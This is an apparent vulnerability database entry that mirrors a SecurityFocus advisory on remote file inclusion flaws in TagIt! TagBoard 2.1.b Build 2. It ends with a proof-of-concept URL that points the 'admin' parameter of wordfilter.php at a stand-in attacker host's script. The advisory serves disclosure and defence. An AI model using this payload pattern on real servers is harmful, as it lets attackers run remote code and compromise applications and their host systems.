Tagit! Tagit2b 2.1.B Build 2 tagmin/wordfilter.php admin Parameter Remote File Inclusion

2014-07-01T00:00:00
ID SSV:83085
Type seebug
Reporter Root
Modified 2014-07-01T00:00:00

Description

No description provided by source.

                                        
                                            
                                                source: http://www.securityfocus.com/bid/22518/info
               
TagIt! TagBoard is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.
               
Exploiting these issues may allow an attacker to compromise the application and the underlying system; other attacks are also possible.
               
TagBoard 2.1.b Build 2 and prior versions are vulnerable. 

http://www.example.com/[TagIt_path]/tagmin/wordfilter.php?admin=http://example2.com/evil?